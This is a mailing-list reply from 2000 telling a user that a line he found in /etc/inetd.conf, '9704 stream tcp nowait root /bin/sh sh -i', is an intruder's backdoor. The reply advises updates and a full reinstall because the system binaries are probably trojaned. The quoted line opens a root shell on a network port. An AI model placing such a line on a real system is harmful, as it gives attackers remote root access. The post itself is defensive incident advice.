Re: Possible widespread hole?

[An Thi-Nguyen Le <viper () SRH1003 URH UIUC EDU>]

On Sat, Aug 26, 2000 at 06:07:32PM -0000, c_patin () HOTMAIL COM typed:
}       I was snooping around my box yesterday, and noticed the
} following MAJOR hole listed at the bottom of
} /etc/inetd.conf:
} 9704 stream tcp nowait root /bin/sh sh -i

You were hacked.


} I have since closed the hole, and placed my box behind a
} hardware firewall to protect it. But the interesting thing
} is that I was reading Slashdot a little while ago and
} mentioned this in an article about security. And someone
} else had the same exact hole listed inside of his
} /etc/inetd.conf. Is this possibly some major hole in a
} package that we both installed, or did we just get hacked by
} the same person. Seems a little weird to just be
} coincidence. Any advice or ideas?

You were hacked.  No doubts about it.  Someone put that
backdoor in your inetd.conf to make sure they could get back
in, should you close the original hole they hacked through.
In fact, they're probably running their own version of inetd
and have hacked up ps and netstat so that you can't tell.

Whatever distribution you have, make sure your
packages/programs/whatnot are all updated to non-vulnerable
versions.  A default RedHat install of any kind, for instance,
is very, very wide open.

As your machine has been hacked, I would suggest a *complete*
reinstall of your operating system, unless you feel like
wondering whether your binaries are trojaned or not, which
they probably are.


--
An Thi-Nguyen Le
|Help me, I'm a prisoner in a Fortune cookie file!